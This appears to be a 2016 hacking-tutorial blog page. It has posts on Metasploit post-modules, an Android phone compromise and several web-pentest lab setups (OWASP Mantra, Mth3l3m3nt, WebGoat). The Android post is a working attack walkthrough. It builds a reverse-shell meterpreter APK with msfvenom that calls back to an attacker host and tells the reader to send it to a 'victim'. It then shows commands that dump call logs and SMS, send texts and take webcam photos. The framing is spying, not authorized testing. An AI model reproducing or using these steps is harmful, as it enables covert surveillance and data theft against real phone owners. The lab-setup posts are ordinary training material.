Hack Wallpaper of Remote Android Phone using Metasploit

at 12:10 AM Saturday, April 2, 2016 0 comments
This module will set the desktop wallpaper background on the specified session. The method of setting the wallpaper depends on the platform type.

First Hack the Victim Android Phone Using Metasploit (Tutorial How to Hack Remote PC)

msf > use post/multi/manage/set_wallpaper
msf post (set_wallpaper)>set WALLPAPER_FILE  /root/Desktop/hack.jpg
msf post (set_wallpaper)>set session 1
msf post (set_wallpaper)>exploit



Labels: ,

Hack Call Logs, SMS, Camera of Remote Android Phone using Metasploit

at 3:38 AM Thursday, March 31, 2016 0 comments

In this article, we will learn how to hack an android device and exploit it according to one’s desires. Android is an operating system based on linux kernel.   It uses APK file format to install any application. Hence, our malware will also be in APK format. To construct the malware use the following msfvenom command :
msfvenom -p android/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 > shell.apk



As the msfvenom malware is created, start the handler in order to have a session and for this type :
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.1.109
set lport 1234
exploit
Once the exploit is executed, send the APK file to the victim and make sure to run the file in their android phone. As the said file will run, you will have session as shown in the image below :


Now, there are various commands to further exploit your victim’s device. We will show you practical of some of the major commands and all of these commands are shown in the image below :



You can check whether the device is rooted or not by using the following command :
check_root


You can also dump all the call-logs by using following command ;
dump_calllog



The above command will generate a TXT file with all the detailed list of call logs. Use the following command to read its contents :
cat



You can also send any kind of SMS from the device, remotely, with the following command :
send_sms -d 9599387847 -t hacked



You can even use the following command to capture a picture :
webcam_snap
It will save the picture in to JPEG file.



Similar to dumping the call logs, you can also dump all the SMSs will the following command :
dump_sms


And then you can read the sms dump file using cat command as shown in the image below :



This way, you can exploit android as the way you like it.
Labels: ,

Setup Browser Based Framework for Web Penetration Testing in Kali Linux (Mantra Toolkit)

at 10:38 AM Thursday, March 24, 2016 0 comments
OWASP Mantra - Free and Open Source Browser based Security Framework, is a collection of free and open source tools integrated into a web browser, which can become handy for penetration testers, web application developers, security professionals etc.

OWASP Mantra provides:
·         A web application security testing framework built on top of a browser.
·         Supports Windows, Linux(both 32 and 64 bit) and Macintosh.
·         Can work with other software likeZAP using built in proxy management function which makes it much more convenient.
·         Available in 9 languages: Arabic, Chinese - Simplified, Chinese - Traditional, English, French, Portuguese, Russian, Spanish and Turkish
·         Comes installed with major security distributions including BackTrack and Matriux

Open your kali Linux terminal and type


apt-get install owasp-mantra-ff


After installing the setup again open your terminal and type

owasp-mantra-ff


Now we can access all the tools that OWASP Mantra

Labels: ,

Setup Web Penetration Testing Lab using OWASP Mth3l3m3nt Framework

at 1:24 AM 0 comments
OWASP Mth3l3m3nt Framework is a penetration testing aiding tool and exploitation framework. Mth3l3m3nt provides the ability to create or do custom LFI and RFI exploits fast with little or no effort at all. It also enables you to store all your quick wins based on its ability to manage HTTP bots, say no to runaway web shells and yes to centrally managed herds in large penetration testing engagements

The purpose of this project is to provide a platform to enable more flexible testing especially in aspects regarding to web security and the OWASP top 10 threats to web applications. This will enable free and open source collaboration, being a web based tool, it is intended to make offensive security on the web easier and more efficient as it leverages on existing technologies with few dependencies. It is built on purely open source components. It is intended to build up to a fully-fledged web penetration testing framework with extensibility for zero day exploits in minutes to users. Currently the features it offers:

·         Multi-Database Support (JIG,SQLite,MySQL,MongoDB,PostgreSQL,MSSQL)
·         LFI/RFI exploitation Module
·         Web Shell Generator (ASP,PHP,JSP,JSPX,CFM)
·         Payload Encoder and Decoder
·         Custom Web Requester (GET/HEAD/TRACE/OPTIONS/POST)
·         Web Herd (HTTP Bot tool to manage web shells)
·         Client Side Obfuscator
·         String Tools
·         Whois



Download WAMP server here. Select save or run. Click open. After that follow the next steps.


Next you will see the Select Destination Location screen. Click Next to continue.


Next you will see the Ready to install screen. Click Install to continue.


Once the files are extracted, you will be asked to select your default browser. Select your default browser’s .exe file, then click Open to continue.



Once the progress bar is completely green, the PHP Mail Parameters screen will appear. Leave the SMTP server as localhost, and change the email address to one of your choosing. Click Next to continue.


Download the latest version of the Software from the github i.e.https://github.com/alienwithin/OWASP-mth3l3m3nt-frameworkrepository.

Extract Mth3l3m3nt lab setup in the location” C:\wamp\WWW\Mth” as is shown below.



Now find the data folder in framework options


Now, the first thing is giving the right permissions to the folders. Right click on them and change the attributes


Now open the htaccess file and add Rewritebase /Mth in Line 8


Next Load the site on the address bar localhost://Mth

The default credentials are:

username: mth3l3m3nt
password: mth3l3m3nt

Labels:

Web Penetration Lab Setup using Webgoat in kali Linux

at 11:52 PM Monday, March 21, 2016 0 comments
WebGoat is a deliberately insecure web application maintained by OWASP designed to teach web application security lessons. You can install and practice with WebGoat. There are other 'goats' such as WebGoat for .Net. In each lesson, users must demonstrate their understanding of a security issue by exploiting a real vulnerability in the WebGoat applications. For example, in one of the lessons the user must use SQL injection to steal fake credit card numbers. The application aims to provide a realistic teaching environment, providing users with hints and code to further explain the lesson.

First Download webgoat from here and Unzip the WebGoat-OWASP_Standard using following command


p7zip -d WebGoat-OWASP_Standard-5.3_RC1.7z


Now goto webgoat folder now you will need to start/stop WebGoat as root
Sh webgoat.sh start8080


Start your browser and browse to http://localhost/webgoat/attack
Login in as:
user = guest,
password = guest


Labels: ,
Subscribe to: Comments (Atom)